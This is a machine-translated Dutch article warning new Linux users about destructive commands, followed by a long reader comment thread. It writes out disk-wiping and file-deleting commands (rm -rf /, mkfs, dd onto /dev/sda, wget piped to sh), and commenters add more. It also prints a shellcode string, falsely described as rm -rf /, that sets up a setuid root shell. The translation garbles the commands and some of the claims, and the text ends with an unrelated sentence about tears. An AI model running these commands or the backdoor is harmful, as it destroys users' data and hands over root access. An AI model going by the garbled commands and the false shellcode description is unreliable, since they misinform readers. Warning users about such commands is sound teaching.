8 dodelijke commando’s moet je nooit draaien op linux

terminal commando’s Linux zijn krachtig, en Linux zal u niet vragen om bevestiging als u een commando dat uw systeem zal breken lopen. Het is niet ongewoon om te zien trollen online aan te bevelen nieuwe Linux gebruikers draaien de volgende opdrachten als een grap.

Het leren van de commando’s moet je niet lopen kan u helpen beschermen tegen trollen, terwijl het verhogen van uw begrip van hoe Linux werkt. Dit is geen uitputtende lijst, en de commando’s die hier kan opnieuw worden gemengd op verschillende manieren.

Merk op dat veel van deze commando’s alleen gevaarlijk zijn als ze worden voorafgegaan door sudo op Ubuntu – zij zullen niet anders werken. Op andere Linux distributies, moeten de meeste opdrachten worden uitgevoerd als root.

Het Krediet: de schedel en opnieuw gemengd van Jason Ford op Twitter

Het commando rm rf / verwijdert alles wat het mogelijk kan, inclusief bestanden op uw harde schijf en bestanden op aangesloten verwijderbare media Devics. Deze opdracht is begrijpelijk als het afgebroken

rm – Verwijder de volgende bestanden.

rf – Run rm recursief (verwijder alle bestanden en mappen in de opgegeven map) en de kracht-verwijder alle bestanden zonder waarschuwing jou.

/ – Vertelt rm om te beginnen bij de root directory, waarin alle bestanden op uw computer en alle gemonteerde media-apparaten, zoals externe shares-bestand en verwijderbare schijven bevat.

Linux zal graag gehoorzamen deze opdracht en alles te verwijderen zonder te vragen u, dus wees voorzichtig bij het gebruik ervan! Het commando rm kan ook gebruikt worden in andere gevaarlijke manieren – rm rf ~ zou alle bestanden in je thuismap, terwijl rm rf * zouden al uw configuratie-bestanden te verwijderen..

De les: Beware rm rf.

Hier is nog een stukje code dat is alles over het web

char esp [] __attribute__ ((sectie ( “tekst.”))) / * esp; vrijlating * /; = “\ XEB \ x3e \ X5b \ x31 \ xc0 \ x50 \ x54 \ X5a \ x83 \ XEC \ x64 \ x68 “,” \ xff \ xff \ xff \ xff \ x68 \ XDF \ xd0 \ XDF \ xd9 \ x68 \ X8d \ x99 “,” \ XDF \ x81 \ x68 \ X8d \ x92 \ XDF \ XD2 \ x54 \ x5e \ XF7 \ x16 \ XF7 “,” \ x56 \ x04 \ XF7 \ x56 \ x08 \ XF7 \ x56 \ x0c \ x83 \ XC4 \ x74 \ x56 “,” \ X8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ XCD \ x80 \ x31 “,” \ xc0 \ x40 \ XEB \ xf9 \ xe8 \ XBD \ xff \ xff \ xff \ x2F \ x62 \ x69 “,” \ x6e \ x2F \ x73 \ x68 \ x00 \ X2D \ x63 \ x00 “,” cp -p / bin / sh /tmp/.beyond, chmod 4755; /tmp/.beyond, ”

Dit is de hexadecimale versie van rm rf / – het uitvoeren van deze opdracht zou wegvagen uw bestanden net alsof je was weggelopen rm rf /.

De les: Loop niet vreemd uitziende, uiteraard vermomd commando’s die u niet begrijpt.

De volgende regel is een simpel ogende, maar ook gevaarlijk, bash-functie

Deze korte lijn definieert een shell functie die nieuwe kopieën van zichzelf creëert. Het proces repliceert zich voortdurend, en de kopieën ervan voortdurend herhalen zichzelf snel toegang tot al je CPU en geheugen. Dit kan ertoe leiden dat uw computer te bevriezen. Het is eigenlijk een denial-of-service-aanval.

De les: Bash functies zijn krachtig, zelfs zeer korte.

Afbeelding Credit: Dake op Wikimedia Commons

De mkfs.ext4 / dev / sda1 opdracht is eenvoudig te begrijpen

mkfs.ext4 – Maak een nieuwe ext4-bestandssysteem op het volgende apparaat.

/ Dev / sda1 – Geeft de eerste partitie op de eerste harde schijf, die waarschijnlijk in gebruik is.

Bij elkaar genomen, kan dit commando vergelijkbaar met het uitvoeren format c zijn: op Windows – het zal de bestanden af ​​te vegen op uw eerste partitie en te vervangen door een nieuw bestandssysteem.

Deze opdracht kan komen in andere vormen ook – mkfs.ext3 / dev / sdb2 zou de tweede partitie op de tweede harde schijf met het ext3 bestandssysteem formatteren.

De les: Pas op voor het uitvoeren van opdrachten rechtstreeks op de harde schijf apparaten die beginnen met / dev / sd.

De command> / dev / sda lijn werkt op dezelfde manier – het loopt een commando en stuurt de output van dat commando direct op de eerste harde schijf, direct schrijven van de gegevens naar de harde schijf en beschadiging van uw bestandssysteem.

commando – Voer een commando (kan elk commando.)

> – Stuur de uitvoer van de opdracht naar de volgende locatie.

/ Dev / sda – Schrijf de uitvoer van de opdracht rechtstreeks op de harde schijf.

De les: Zoals hierboven, pas loopt commando’s die de harde schijf apparaten te beginnen met / dev / sd betrekken.

De dd if = / dev / random of = / dev / sda lijn ook de gegevens vernietigen op een van uw harde schijven.

dd – Voer low-level kopiëren van de ene locatie naar de andere.

if = / dev / random – Gebruik / dev / random (willekeurige gegevens) als de input – kan u ook locaties zoals / dev / zero (nullen).

of = / dev / sda – Uitvoer naar de eerste harde schijf, ter vervanging van het bestandssysteem met willekeurige wartaal.

De les: dd kopieert gegevens van de ene locatie naar de andere, wat gevaarlijk kan zijn als u kopieert naar een apparaat.

Afbeelding Credit: Matt Rudge op Flickr

/ Dev / null is een andere bijzondere locatie – het verplaatsen van iets naar / dev / null is hetzelfde als te vernietigen. Denk aan / dev / null als een zwart gat. In wezen, mv ~ / dev / null stuurt al uw persoonlijke bestanden in een zwart gat.

mv – Verplaats het volgende bestand of de map naar een andere locatie.

~ – Geeft je hele thuismap.

/ Dev / null – Beweeg je thuismap naar / dev / null, het vernietigen van al uw bestanden en de originele exemplaren te verwijderen.

De les: de ~ karakter geeft uw thuismap en bewegende dingen naar / dev / null vernietigt ze.

Het bovenstaande lijn downloadt een script van het web en stuurt deze naar sh, die de inhoud van het script wordt uitgevoerd. Dit kan gevaarlijk zijn als je niet zeker weet wat het script is of als u niet de bron vertrouwen – niet-vertrouwde scripts uit te voeren.

wget – Download een bestand. (U kunt ook zien krullen in plaats van wget.)

http://example.com/something – Download het bestand van deze locatie.

– Pipe (stuur) de output van het wget commando (het gedownloade bestand) rechtstreeks naar een andere opdracht.

sh – Stuur het bestand naar de sh commando, dat het uitvoert als het een bash script.

De les: Weet niet downloaden en uitvoeren van niet-vertrouwde scripts van het web, zelfs met een opdracht.

Weet elke andere gevaarlijke opdrachten die nieuwe (en ervaren) Linux-gebruikers niet zou moeten lopen? Laat een reactie achter en deel ze!

rm *; Dit ook. Verwijdert alle bestanden in de map. Vaak gebruikte met su, gevolgd door het wachtwoord, gevolgd door cd \, gevolgd door dit.

Nog een

chmod 777 -R /

huhu

dd if = / dev / urandom of = / dev / mem bs = 1 tel = 1 seek = $ RANDOM

Ook een killer; opstarten vanaf een cd en uitvoeren: D: / i386 / winnt …

oh, zoals leuke grappenmakers, zo superieur en slim! en mensen vragen zich af waarom Linus niet neemt over de hele wereld, vrij en al.

Hebben jullie ooit geprobeerd zelfmoord Linux?

In ieder geval zal Windows niet laten u uw C formatteren: station terwijl Windows wordt uitgevoerd. Waarom doet Linux doen terwijl Linux draait? Is het niet Linux betekende meer veilig?

maar dd if = / dev / zero of = / dev / sda is perfect als u alle gegevens van de aandrijving en u wilt veilig veeg de schijf en nullen te schrijven over de gegevens, zodat het niet terug kan worden gekregen. U kunt de harde schijf met nullen dd formatteer de schijf met een NTFS of FAT-partitie en bereid zijn om de drive opnieuw te gebruiken, en de rit zou stevig worden afgeveegd.

Nr, Linux is niet bedoeld veiliger zijn. Het is bedoeld om op grote schaal beschikbaar zijn voor gebruik en ontwikkeling.

Boven is veel gevaarlijker, kan dit worden gecombineerd met een opdracht, zoals sed of awk normaal om te kijken. Uitstekend artikel.

Niet dat linux is veiliger, alleen maar zeggen dat je Linux kunt gebruiken om veilig veeg je harde schijven met dd …

Is een antivirus voor Linux te voorkomen dat deze berichten met sudo?

“\ Rm rf *

is een opdracht die me heeft gekregen in de problemen op meer dan één gelegenheid. Vooral als ik van plan om iets na het sterretje te typen, maar mijn duim druk op de spatiebalk per ongeluk en / of als ik niet in het telefoonboek of terminal sessie Ik dacht dat ik in.

De voorgaande “\” vertelt het OS aan een alias u misschien setup te beschermen tegen ramp hebben negeren. (Alias ​​rm ‘rm-i’)

-CJ

heeft iemand anders het opzetten van een VirtualBox om het effect van deze te zien? Ik herinner me dat het opzetten van een gevirtualiseerde Windows-formaat uit te voeren: C en wordt gestript het werkte niet. Ik suggereer niet de bovenstaande opdrachten niet btw werken

Noel, wat doe een antivirus-programma te maken hebben met sudo (of een andere legitieme Linux / Unix commando)? Linux / Unix gaat uit van de root-gebruiker weet wat hij / zij doet. Als dat niet het geval is, dan heb je geen bedrijf actief als root, en verdienen de gevolgen van je acties.

De meeste van deze vereisen root-rechten effectief te zijn en als je niet weet wat je doet moet je niet hoeft / worden met behulp van dat voorrecht toch

Dit is een groot artikel. Ik veronderstel dat de meeste mensen dat de opdrachtregel gebruiken hebben een kleine Geek in hun DNA, maar ik denk dat we niet van uitgaan dat om helemaal waar te zijn. Zelfs Geeks graag experimenteren al … wat gebeurt er als ??? Ik heb alleen mezelf de schuld voor een deel van de dingen die ik eigenlijk wist wel beter dan te doen. Regel nummer 1: BACK-UP. Regel # 2 tot en met 10: BACK-UP !!!!!!

mv: kan niet overschrijven niet-directory `/ dev / null ‘met directory` / home / joe’

mv ~ / dev / null – serieus? Je zult niets te verwijderen met die;. Rm rf / werkt niet ofwel (op zijn minst op de moderne distro’s) moet je rm rf gebruiken / *

@Paul: Het is beter te beveiligen. Maar probeert ook de superuser niet beperken. En superuser moeten de bevoegde persoon. Het is ook de reden waarom Ubuntu toont de gebruiker gewoon GUI hulpprogramma’s met behulp van sudo en te verbergen wortel acount zo veel als het kan.

Ook goede oude grap met het verwijderen van / windows / system32 voor betere prestaties werkt nog steeds, niet? 🙂

Linux is een geweldig systeem dat gemakkelijk te bedienen voor basis purposes.It’s gebruiksvriendelijker flexibeler dan Windows, maar in het algemeen is het een goed idee om het vertrouwen in een leverancier van hints of informatie hebben alvorens na hun instructies. Dat lijkt vanzelfsprekend, maar het is gemakkelijk te laten meeslepen bij het verkennen van een nieuw pad.

Dank je.

De bottom line is dat nieuwe gebruikers en oude gebruikers gelijk moeten opdrachten te geven, tenzij ze een beetje onderzoek te doen om erachter te komen wat ze zouden eerst moeten doen.

Zoals voor Linux “dit niet te doen” of zogenaamde “veiliger” Unix vanwaar het kwam te zijn, werd ontwikkeld om een ​​mager, snel, power users OS. Het algemene idee was om de gebruiker de meeste macht te geven mogelijke en om aan te nemen dat ze weten wat ze doen als ze een opdracht te geven. Mensen die niet bereid zijn om te leren hoe de instrumenten goed te kunnen gebruiken de command line volledig moeten vermijden en misschien zelfs een besturingssysteem dat een beetje meer hand houden wel gebruiken.

Moet dat niet zijn “een commando dat uw systeem zal breken draaien?

Quote: “terminal commando’s van Linux zijn krachtig, en Linux zal u niet vragen om bevestiging als u een commando dat uw systeem niet zal breken lopen. Het is niet ongewoon om trollen te zien online te bevelen nieuwe Linux-gebruikers deze opdrachten uit te voeren als een grap. “; Unquote

Arg. Dat zou moeten lezen “… en oude gebruikers moeten zowel NIET opdrachten te geven …”

@Paul: Zinvol, maar elk OS onzeker in de hand van een domme Sysadmin.

Zoals Darm hierboven vermeld, een aantal mensen hebben geprobeerd de oude rm standby – bewust en anders – en ontdekten dat, hoewel het wel schade aan het systeem, het niet uitwissen “alles” te wijten aan problemen met de toestemming en andere redenen. Natuurlijk kan dit onderscheid niet relevant zijn, afhankelijk van wat schade optreedt.

Zoals opgemerkt, de meeste zijn alleen gevaarlijk wanneer zij ingebed in scripts van het internet heeft gedownload en niet onderzocht. Ze zijn waarschijnlijk niet worden ingevoerd door een ongeval, zelfs door een naïeve gebruiker. Zelfs de rm ene moet u gaan naar de “/” te beginnen bij de wortel tot de echte schade doen – gedaan vanaf een lager niveau niet-systeem directory zal het systeem niet beschadigen.

De meeste van deze trucs bestaan ​​uitsluitend voor kwaadwillig gebruik en dient vermeden te worden om die reden.

Christine: De oplossing voor de duim op de enter toets fout is om te veranderen naar de map u het wilt uitvoeren vanaf en voer het vanaf daar. Op die manier kun je niet per ongeluk iets te wissen. In het algemeen, bij gebruik van de command line, is het best om de typering van target directories te minimaliseren om ongelukken te voorkomen door een omschakeling naar de betreffende map (of haar moedermaatschappij) eerste, of door het kopiëren en plakken van de volledige pad naar het commando van een directory-display (terminal of GUI). Het bespaart het typen en helpt bij het voorkomen van problemen.

Deze dagen in Linux ik bijna nooit gebruik maken van de command line, behalve af en toe een split-bestand samen te voegen, zet een HTML-bestand in een PDF, of lopen top om te zien waarom het systeem is beladen. De GUI-interface verzorgt alles netjes.

Een normale gebruiker bijna nooit nodig heeft om de command line te gebruiken en nooit met een aantal lange meerdere commando string – tenzij er na enkele instructies vormen een forum terwijl ze geholpen met een probleem. Dus lopen in een van de genoemde commando is zeer onwaarschijnlijk.

@paul, Linux is beter beveiligen door niet beperkend wat een gebruiker kan doen. Door het hebben van volledige controle over uw computer kan je dingen veranderen hoe je ze leuk … Inderdaad, deze commando’s zijn gevaarlijk, maar commando’s zoals deze kunnen ook werken op Windows, misschien met een 3rd party applicatie. Het is gewoon een “simpele” als lus die ramen beschermt tegen zichzelf te beschadigen. Een 3rd party app zou dit niet te controleren. Zie het misschien als een virus app?

Om de respons op Paul’s commentaar: –

“Tenminste Windows zal niet toestaan ​​dat u uw C formatteren: rijden terwijl Windows wordt uitgevoerd. Waarom doet Linux doen terwijl Linux draait? Is het niet Linux betekende meer veilig te zijn? ‘

Ja, Linux is veiliger, maar dit is niet een kwestie van veiligheid, Linux vertrouwt erop dat wat de gebruiker te horen dat het te doen, is wat de gebruiker wil doen (zonder al de ‘weet je zeker dat’ vraagt). Als je zegt dat je een Linux machine “Verwijder alle bestanden van de root directory recursief”, dan doet het.

Gelukkig, dank zij de beveiliging, tenzij je dat commando als root draaien, je zult unlikey uit te roeien belangrijke systeembestanden zijn zoals ze zijn alleen-lezen door niet-root-gebruikers. Met Windows, heb ik gezien aanwijzingen die zeggen: “Het is niet toegestaan ​​om de inhoud van deze map bekijken, maar als u hier klikt dan kunt u”. Ik bedoel serieus, WTF?

Niets is idiot proof, je moet weten dat al ..

@ Badger_fruit: re: “… Linux is veiliger, maar dit is niet een kwestie van veiligheid, Linux vertrouwt erop dat wat de gebruiker te horen dat het te doen, is wat de gebruiker wil doen …”

Dit heeft weinig zin, omdat je ervan uitgaan dat gebruikers ofwel altijd weten wat te doen, of moeten ze gewoon weg te houden. Dit verslaat het hele punt van elke nieuwe generatie van gebruikers die proberen vertrouwd met het OS te krijgen, zelfs als root. Er is een leercurve om alles, en Linux zeker niet vertrouwt de gebruiker commando’s, of maak zelf niet meer veilig omdat u de vrijheid om commando’s te starten zonder veiligheid aanwijzingen te hebben. Dit artikel gaat over de kwestie van de beveiliging van Linux.

Ive gezien veel mensen hebben moeite met rm. * (Of een bestand te veranderen met de opdracht. *)

Meestal heb ik gezien het gebruikt als iemand wil alle schrappen; “.” “Verborgen” bestanden die beginnen met in hun home directory. (I.e..profile, .history, etc.)

Vervang ik altijd het commando “rm” met “ls” eerste om te testen of het zal beïnvloeden; de bestanden die ik denk het wel.

Linux / UNIX “veronderstelt” je weet wat je doet. Hoewel Linux meer mainstream geworden, maar nog steeds is het oorspronkelijke karakter. UNIX-gebaseerde systemen zoals Linux zijn “zeer” krachtig en hebben geen tijd om u te knuffelen en voortdurend zorg ervoor dat Zoals de meesten weten “je cool met wat je wilt doen bent” hebben, is UNIX geen een giller geven, vraag je het opblazen van de wereld, en het zal zonder nadenken een nanoseconde’s over en het zal u ook niet te raadplegen.

Linux (en UNIX in het algemeen) herinner me van een kettingzaag. Iedereen kan een kettingzaag kopen. Bevoegde; mensen gebruiken ze veilig. Idioten snijden in hun eigen benen af.

@Paul: Het is beter te beveiligen. U ziet, Linux-gebruikers niet in te loggen als root, routinematig. Ze loggen in met beperkte privileges. Die commando’s werken alleen als u ingelogd bent als root, met alle privileges gegeven. Sere paragraaf 3 van bovengenoemde artikel

“Merk op dat veel van deze commando’s alleen gevaarlijk zijn als ze worden voorafgegaan door sudo op Ubuntu – zij zullen niet anders werken. Op andere Linux distributies, moeten de meeste opdrachten worden uitgevoerd als root. ”

In Windows, één ervan uitgegaan dat de gebruiker root privileges. UAC is bedoeld om te beantwoorden voor dit gebrek aan veiligheid (u kunt zich aanmelden als ‘root’, maar met UAC ingeschakeld, wordt u gevraagd of u wilt om dingen te doen) .; Het verschil is: terwijl u wordt gevraagd of u wilt een te doen bepaalde taak of moet ingelogd als admin aan, virussen en malware graag doen wat ze willen, omdat ze ‘executables’ en de schrijvers in staat zijn geweest om dat nutteloze UAC ding te omzeilen geweest doen;. in Linux, niets loopt, tenzij u heb er toestemming gegeven. Of tenzij je doelbewust log in als SuperUser en de afgifte van gevaarlijke opdrachten. Met macht komt verantwoordelijkheid.

“Gegen Dummheit kämpfen Götter selbst vergebens …”

@ NV1T

Uw metafoor over UNIX is precies goed. Nu om dit te proberen in een VM …

Linux is niet een goede keuze voor de gemiddelde gebruiker. Mensen die de computer te behandelen alsof het een broodrooster. Mensen die door een broodrooster zou worden verward met beide hefbomen!

Je weet wel, de typische Mac-gebruiker!

@ NV1T & oldgeek 1

@Robynsveil Dit citaat is zo waar! (& Dank aan Google …)

Niet echt, in dit voorbeeld; $ cp -R / usr. #Toe maak een directory tree; $ mv usr / / dev / null; mv: kan niet overschrijven niet-directory `/ dev / null ‘met directory` usr /’; # mv commando, in dit geval, in staat om een ​​niet te vernietigen -Lege directory

Baleet System32!

Serieus, ik heb genoten van het lezen van dit.

Ha, .. alles wat ik krijg van dit is dat de meeste van je klinkt als een heleboel kinderen proberen om cool te zijn,. Maar je gewoon niet, nietwaar?

om richard

De command line is nog steeds erg handig voor het Linux-ontwikkelaars echter. Beheersing van de command line is van essentieel belang voor het begrijpen van de kracht van Linux.

Linux heeft het gebruik ervan (in dit hart is klein en efficiënt), maar het is inherent onvriendelijk en ontworpen voor geeks. Het is grote besparingen brace is dat je een GUI / shell erover dat de ingewanden verbergt haar gebruikers kunnen creëren. Laatste keer dat ik gecontroleerd, dat is wat Apple deed met zijn computers, en ik denk dat is wat je kunt vinden op Android-telefoons. Ik geloof dat TIVO we dit doen ook.

nou ik liep mkfs.ext4 / dev / sda1 en zaagsel toen ik niet kon opstarten van mijn PC de volgende keer en ik kreeg een toen ik ook geprobeerd om opnieuw te installeren dat mijn harde schijf niet bestond. Vandaag las ik meer over de nieuwe commando voordat ik voer het uit.

Ik begrijp niet het punt van dit artikel te zien. Er zijn letterlijk miljoenen manieren om een ​​draaiend systeem beschadigen als superuser, zij het UNIX, Linux of Windows. Dit is de reden waarom op mission critical systemen die u meestal betaalt systeembeheerders om een ​​goede job doen in plaats van het laten van een slechte n00b rondneuzen.

[-1] Voor stomheid

Paul: rmdir / s / q C: \ *; werkt aardig op ramen, natuurlijk admin recht nodig.

de meeste van deze opdrachten zal niet werken op de recente verspreiding of slecht setup systemen; rm rf / – dat werkt niet voor jong en oud. U mus -geen-bewaren-root argument gebruiken om rm dwingen te doen;. Forkbomb – nou ja, als je ulimit niet goed ingesteld, het is uw probleem, is het niet, mkfs zal niet overschrijven gemonteerd bestandssysteem, zodat je / is? veilig. En als het bestandssysteem niet is bevestigd, zal het een waarschuwing over andere filesystem heden weer te geven en vraagt ​​de gebruiker om goedkeuring;. Mv ~ / dev / null – goed, dat is volslagen onzin, je kunt niet een bestand te overschrijven met een directory, kan u? Als u regelmatig file over / dev / null verhuizen, verlies je het karakter-bestand en kan de inhoud van het dossier verliezen als sommige programma’s zou kunnen overschrijven.

Alleen dd en wget bijvoorbeeld doet wat je verteld te doen.

vergat te vermelden, de bash forkbomb zullen andere middelen te consumeren uit het geheugen eerder. De PID is goed voorbeeld van.

* Om de man met de vraag of GNU / Linux wordt verondersteld te zijn meer veilig te stellen is het antwoord ja. Maar het is als volgt: je een gifbeker te geven aan een stomme ezel en vertel hen niet om het te drinken, maar ze doen toch. Het heeft niet een deksel op, dus alles wat ze moest doen was het te zetten aan hun mond en drinken. GNU / Linux is als het geven van die persoon een gifbeker met een bochtige deksel erop. Als ze dom genoeg om de deksel untwist en drinken, dan zijn ze op hun eigen.

tl; dr Een OS zal niet iemand uit hun eigen domheid te redden. U kunt alleen voorkomen dat een persoon uit het doen van domme dingen met hun computer zo lang.

Ik ben het eens met Tim, ik denk dat de meeste mensen wenden tot Linux, hetzij van het hebben om ermee te werken, of mensen die op zoek zijn naar een besturingssysteem dat ze meer controle over hun systeem geeft. Als u niet wilt linux u moet vermijden te leren, ik moet eerlijk zeggen dat het leren van Linux was een van de meer de moeite waard leren ervaringen die ik heb gehad en de moeite waard elke minuut.

Dat wuz mooi, denk dat ik ga huilen.

Bedankt voor de post. Ik heb per ongeluk verpest mijn OS voor het gebruik van de opdrachtregel. Deze zijn goed om te weten. Ik denk dat op een gegeven moment wilde ik het eigendom van alle bestanden in een map, en sub-directories te veranderen. Ik bedoelde te typen

chown gebruiker: user -fR./*.8

in plaats daarvan Ik typte

chown gebruiker: user -Fr /*.8

Oeps. Nou ja, in ieder geval Linux is snel te installeren, en als goed ingesteld, kunt u de meeste van uw gegevens en instellingen op te slaan.

Persoonlijk denk ik niet hetzelfde als een “veilige” computer “Idiot Proof ‘. Beveiligde computers voorkomen dat anderen uit te breken, idiot proof verhindert me uit te breken. Ik begrijp dat anderen willen of nodig hebben meer idioot proofing. Dat is de reden waarom andere OS’s zijn populair. Ieder zijn eigen.

Hrm niet zeker waar de “0,8” kwam uit op het einde van die commando’s hierboven.

Vraag! Betekent dit werk op alle UNIX-gebaseerde systemen zoals MacOSX? Gewoon nieuwsgierig.

Dit is meer dan genoeg om een ​​beginner veroorzaken aan haar scheuren / zijn haar uit!

Bloedige farklempt, het is!

Hier is voor degenen onder ons die opgroeiden tijdens de vroege dagen van de MS-DOS …; RECOVER.EXE;! Inbegrepen bij DOS, deze eenvoudige kleine utility aangenomen had je bestandssysteem kwesties, zonder waarschuwing, dat alle submappen en alle vermeldingen in verwijderd de root directory, het creëren van nieuwe bestanden met namen zoals “FILE0001.REC” in de root directory.

Ik herinner me verpest mijn 5.25 “DOS boot diskette op deze manier. Gelukkig was ik met behulp van een DISKCOPY’d back-up.

Een andere mooie one …; FORMAT.COM / AUTOTEST

Maar mijn vraag is waarom deze commando’s zijn nog steeds toegestaan ​​om uit te voeren ??

@raviteja onwetendheid van de kant van de gebruiker is geen reden om zich te ontdoen van iets. Omdat sommige mensen kunnen niet rijden moet je auto’s te verwijderen uit de weg?

@Joseph Meeste Macs hebben bash, die zou komen met al deze commando’s, dus ja. Ran rm RF aan de ene dat ik het wissen voor de lol. Na een paar minuten het gewoon opgesloten lol.

@michael rm RF / werkt nog steeds, tenzij iemand het bevel ik zie niet in waarom het niet zou herschreef. Ook de verhuizing moet zo lang als je het recursieve te werken. En u bent het verplaatsen van bestanden niet te overschrijven.

Sorry michael, vergat dev / null wordt beschouwd als een bestand niet van een directory, zodat je hebt gelijk het mv zal niet werken

Sure Windows is veiliger dan Linux, toch? Omdat je zou gaan om gewoon lopen willekeurige commando’s die u vinden op het internet. Natuurlijk, na de eerste verheffen naar niveau wortel, zodat ze kunnen niets doen (omdat zeker je leren kennen als een normale gebruiker u geen toegang tot uw harde schijven direct en dergelijke). Maar in Windows, zou je nooit een willekeurig programma te downloaden (Mila.Kunis.Nude.Screensaver.exe anyone?) En ze gewoon lopen, klik vervolgens op de JA op de UAC dialoog (als je niet hebt uitgeschakeld UAC in de eerste plaats) gewoon om te zien al uw kostbare gegevens verdwijnen?

Ook in Windows is het perfect mogelijk om een ​​volledige harde schijf, zelfs uw systeem harde schijf wissen, tijdens het hardlopen. Het is gewoon dat het een beetje meer uitgebreid. In Linux kunt u gemakkelijk en out of the box te doen, maar op Windows moet u hulpprogramma’s van derden te downloaden (en waarschijnlijk betalen voor hen ook).

Voordat u begint met schaamteloos onwetend commentaar te posten, misschien vertrouwd te maken met het onderwerp eerste, zodat je er niet uit als je absoluut geen idee waar je het over hebt.

“Paul; Tenminste Windows zal niet toestaan ​​dat u uw C formatteren: station terwijl Windows wordt uitgevoerd. Waarom doet Linux doen terwijl Linux draait? Is het niet Linux betekende meer veilig te zijn? ‘

Linux weigert een gemonteerde partitie te formatteren (maar kan worden gedwongen)! Niet te laten de beheerder formaat uw drive is een beperking en niet een veiligheidsconcept. Maar een wereld waarin je nodig hebt om een ​​externe audit formaat van uw harde te doen als een veiligheidsconcept om te voorkomen dat kleine kiddies uit hun porno en games te verwijderen klinkt als een zeer veilige plek voor mij. Laten we het aan Apple over praten.

@Paula Bean: In Windows kun je niet een harde schijf met uw systeem bestanden (die bepaalde partitie) te wissen terwijl het draait. u zou hebben om dit te doen uit cd, usb of een externe bron. U hoeft niet te betalen voor 3rd party tools waarmee u het ook niet te doen.

“Voordat u begint met schaamteloos onwetend commentaar te posten, misschien vertrouwd te maken met het onderwerp eerste, zodat je er niet uit als je absoluut geen idee waar je het over hebt.”

Gewoon niet gebruiken sudo, tenzij je weet wat je aan het doen bent. Linux kan meest gevaarlijke dingen niet zonder super-user rechten. Ook daarom niet willekeurig in uw wachtwoord in te vullen wanneer het u vraagt.

gebruiken ze maar dankzij nooit voor de kenniseconomie. Je bent cool man!

nooit gebruiken als je niet weet over deze opdracht!

Linux is over zijn controle niet onder controle 🙂 dus het is een os die je geeft de status van god … als dat littekens je terug naar ramen en zijn een schaap

en het goede ding over linux is … jij bent de enige 1 dat uw systeem waardoor onbekend scrips in dus in gevaar kunnen brengen … u zal nooit een virus Trogen etc, tenzij je het toelaat om te draaien in tegenstelling tot exe / dll stuff

Ik weet dat 3 berichten, maar im dronken … .. er zijn vele scrips daar … Dont was te uw tijd aan het opnieuw uitvinden van het wiel … Thereis sa veel die er zijn gratis …. en 1 ding te kust / zorgen dat u ur werk op te slaan coz het zal krijgen opnieuw instellen linux als een tien-dance c om dat te doen

konden we hebben een uitsplitsing van deze alstublieft?

Ik moet een ding zeggen: als een relatief beginnende gebruiker in de afgelopen jaren niet verder gekomen dan “hors d’oeuvre” niveau commando gebruik, ik ben een beetje shell-geschokt op dit moment over de hoeveelheid basics nam ik voor lief in lin * X. Voor de belachelijke hoeveelheid uren i verdiepten via internet zoekt naar patches en fixes, een Notebook crash en drie formaten (oh, en twee weken) later, ben ik eindelijk vernederd ?? Ik weet voorzichtig in de root te zijn, maar duizenden mensen wierp terminal commando’s op blote voeten newbies op het web en ik moest struikelen op een pagina als dit NOW? Ik zie waarschuwingen over het uitvoeren van administrator-level commando’s misschien .. oh, ik weet het niet, 1 voor elke 30-50 sudo commando suggesties. “Op grote schaal beschikbaar.” Laten we het respect voor de vrijheid die we delen in de volgende distro’s alleen dat. Ongetwijfeld de meesten van jullie, net als ik, op grote schaal verdiend jouwe. Ik moet alleen een beetje structuur, weet je;? Bedankt iedereen voor alle bijdragen die je maakt.

Menselijke tranen verschillen in chemische samenstelling op basis van de oorzaak van de tranen (zoals lachen / plezier, verdriet of reactie op externe stimuli zoals ui dampen).